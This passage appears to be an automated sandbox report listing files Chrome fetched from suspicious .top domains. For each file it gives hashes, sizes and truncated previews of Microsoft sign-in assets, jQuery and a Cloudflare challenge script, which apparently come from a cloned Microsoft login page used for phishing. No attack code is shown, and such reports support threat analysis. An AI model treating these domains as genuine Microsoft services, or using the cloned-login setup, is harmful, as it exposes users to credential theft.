                                                    MD5:301F68F3D8317AB22D4021E266C9A853
                                                    SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                    SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                    SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1864
                                                    Entropy (8bit):5.222032823730197
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (45797)
                                                    Category:downloaded
                                                    Size (bytes):406986
                                                    Entropy (8bit):5.31789636250024
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9083D228E539FD87EF95A94B7ABC396C
                                                    SHA1:159AE950D79B4987D65F18FFBF6FF87D76C5B536
                                                    SHA-256:54B34EA260D9DCF6D7961A60C9B540673312A965F9DDC2F1AB9855D622BFA07C
                                                    SHA-512:1306A0CFBA637F249786677E9C29D72E15C72F1575DEB217E9E965E456D2320C5644CDE43F06BA1E8373D11E16D33DD955FB3E9077C38F585E4A33B5A1075A0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(539).concat([f
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 36 x 51, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):61
                                                    Entropy (8bit):4.035372245524405
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B71AAAF57CC6B4E85482B56CEEDF0A75
                                                    SHA1:114DEA452E06E357B0AEA2AB02652BFF444369FE
                                                    SHA-256:C906E325C69C8102039DDCAE1C3A62457996F3AFACA3EFC8256D254E5172C703
                                                    SHA-512:CAFC023AF0C50944178024D125E772D219AD0AA19527A418853780553682EA861C9EAE69A90C3A946EEAB3B09DC0FF84111CE8B207B5FD2BDF6A986BC05AA102
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR...$...3.....p.=.....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):839
                                                    Entropy (8bit):7.641957480639189
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5C24581E929CECC71D7C54C84FF198A8
                                                    SHA1:CF8C4B8FAC641392A32451DB5280154A8A96CBE6
                                                    SHA-256:4692F553B87E7B67E94B129D4A4CB0FD2F985E2C8E307497704BC0C6766E6385
                                                    SHA-512:4779A625436BD9C37FAEAA8677B3E9134FBF8BFC7224B503DDC9062B7CD33424FEA2FC8A79974F5B240BC6A686B749E247CA7F7A5CD4D1188A5F74E87A6B3D2F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR... ... .....szz.....pHYs..........&.?....IDATX..WKh.Q.}.|..Qt..N.].t.....Zc.X?.*.X.F...P7..TD..]..;...+....i..44.iJ.L~..w2.iQ......1I.9.....0.Q...x.+sS....Z...u' ....g&[.$4.@....p..#^`.<.<`..... .;..1.1...`....D=..D...h......a...v)...h=.....w.$.8..a.....1`.7..:....~7..Fa...;L.1. C.s....'......~...z..zc...l.....u.p.-E.24...(\y...O.4o...?..t#....W..P....(...#.Y.;.G.\.C.X&..d..u......b.......k..|..e......Y K...d>.....Sd.Z.W..0.........l.Ta..H....yMW......T.]7.....qSj@.f...y...EX.j.?..3 5..4.N...._..j7..DM.d...2=.....R...i....w.......$.........p.q?..z5..N.OM..4..K.f.;.Ts.hD..E...D.....?.4.......d...b..T.V.........S.3Y...!...q>.Y...*...)..sC..t...... ....*.].O?.H...%.w...B..f.~P..(_.]..3,@(.....p.QL...k...yF.!.Zc.y..f..Dy!...'6...y1)U....D..Z.I.?..`../c.z.>..L.....>A!G......IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (61177)
                                                    Category:downloaded
                                                    Size (bytes):113424
                                                    Entropy (8bit):5.2850742719795925
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F3588C5412D4119F95E47073A4A5DF72
                                                    SHA1:3C4B1652E71C25E1CE7DE611FBD17EDBAAE411D9
                                                    SHA-256:6CC79C59F00478CE5D8EAA982EFDD8FC3CC205A7EA023A564BB2688FA206A087
                                                    SHA-512:62886F8BFB32D2BE842A23ECA157556C30EC1D616E2607D9DF1894F702BB7A982EEB3576C95F859B4B8E9183A84D70149A8802F31317F80D4845B02CCFA018F9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                    Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65450), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):119666
                                                    Entropy (8bit):5.356324858332371
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9B1C904993DFCA1F720817B83A73BEB0
                                                    SHA1:EB546213D2D288AD9673AE10105F691CC55C82E5
                                                    SHA-256:52DC7E52F43B3C53702A9473769E15291EA0CCC7048269B9AD703F2C98AE814B
                                                    SHA-512:B0DA5A6202F75993A95E332D95363169F72C91D98C45D8DF8155504F759EA9913165DCDF38E9D12BCCE995147AC648BB2E7DC11F91BA39B93C8DF3F2C038DF76
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/ests/2.1/content/cdnbundles/watsonsupportwithjquery.3.5.min_dc940oomzau4rsu8qesnvg2.js
                                                    Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */..!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,delNonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8793), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):8793
                                                    Entropy (8bit):5.731031840825606
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:29D10611982316DCB11A5B68F5CE4F5E
                                                    SHA1:D012A26CA6B9CE9EE6639136F9CD515F197278DA
                                                    SHA-256:76976FC65B8BDBFCD3A6BEF01D455857F9A8181F16CD85261D425B4979057709
                                                    SHA-512:7EAC26E86FA2D726335DE653EE5DA61611406E39004B97E572BC23A1BC2DCFD24FE619304783C4D3DC9E39B89EB0B233684090F15F51C5A8E8C09F673923ADD7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://jackoffjackofflilliilkillxoopoeadonline.top/cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js?
                                                    Preview:window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=parseInt(V(438))/1*(-parseInt(V(463))/2)+parseInt(V(519))/3+parseInt(V(489))/4*(parseInt(V(404))/5)+parseInt(V(505))/6+-parseInt(V(437))/7*(-parseInt(V(456))/8)+-parseInt(V(512))/9*(-parseInt(V(473))/10)+parseInt(V(483))/11*(-parseInt(V(515))/12),d===f)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,771957),h=this||self,i=h[W(428)],n={},n[W(510)]='o',n[W(520)]='s',n[W(474)]='u',n[W(516)]='z',n[W(517)]='n',n[W(462)]='I',n[W(469)]='b',o=n,h[W(401)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,F===null||F===void 0)return H;for(J=x(F),E[a8(468)][a8(444)]&&(J=J[a8(481)](E[a8(468)][a8(444)](F))),J=E[a8(522)][a8(518)]&&E[a8(454)]?E[a8(522)][a8(518)](new E[(a8(454))](J)):function(P,a9,Q){for(a9=a8,P[a9(434)](),Q=0;Q<P[a9(441)];P[Q]===P[Q+1]?P[a9(424)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(421)][a8(488)](K),L=0;L<J[a8(441)];M=J[L],N=v(E,F,M),K(N)?(O=N==='s'&&!
                                                    No static file info